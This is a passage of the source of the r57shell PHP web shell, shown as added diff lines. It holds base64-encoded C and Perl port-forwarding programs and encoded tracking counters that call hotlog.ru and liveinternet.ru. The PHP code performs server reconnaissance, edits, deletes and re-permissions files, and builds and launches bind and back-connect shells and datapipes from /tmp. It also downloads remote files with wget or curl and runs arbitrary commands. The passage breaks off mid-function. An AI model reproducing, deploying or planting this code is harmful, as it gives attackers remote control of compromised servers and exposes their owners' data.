+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
+JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
+lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
+FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
+3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
+J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
+oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
+xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
+i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
+dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
+ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
+hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
+$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
+IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
+hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
+tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
+XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
+8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
+ybmV0LS0+";
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "";
+@readfile ("");}}
+echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp;
+<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b>
+</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
+echo ws(2);
+echo "<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2);
+echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>"));
+echo ws(2);
+echo "PHP version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+echo ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
+echo ws(2);
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo ws(2);
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo ws(2);
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>".ws(2);
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+echo $font;
+if(!$windows){
+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+$uname = ex('uname -a');
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+if(!$safe_mode){
+$bsd1 = ex('sysctl -n kern.ostype');
+$bsd2 = ex('sysctl -n kern.osrelease');
+$lin1 = ex('sysctl -n kernel.ostype');
+$lin2 = ex('sysctl -n kernel.osrelease');
+}
+if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
+else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
+else { $sysctl = "-"; }
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+$id = ex('id');
+echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
+echo ws(3).$dir;
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@get_current_user()."<br>";
+echo ws(3).$dir."<br>";
+echo "</font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(empty($c1)||empty($c2)) { die(); }
+$f = '<br>';
+$f .= base64_decode($c1);
+$f .= base64_decode($c2);
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
+ else {
+ @fwrite($file,$_POST['e_text']);
+ @fclose($file);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -p ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
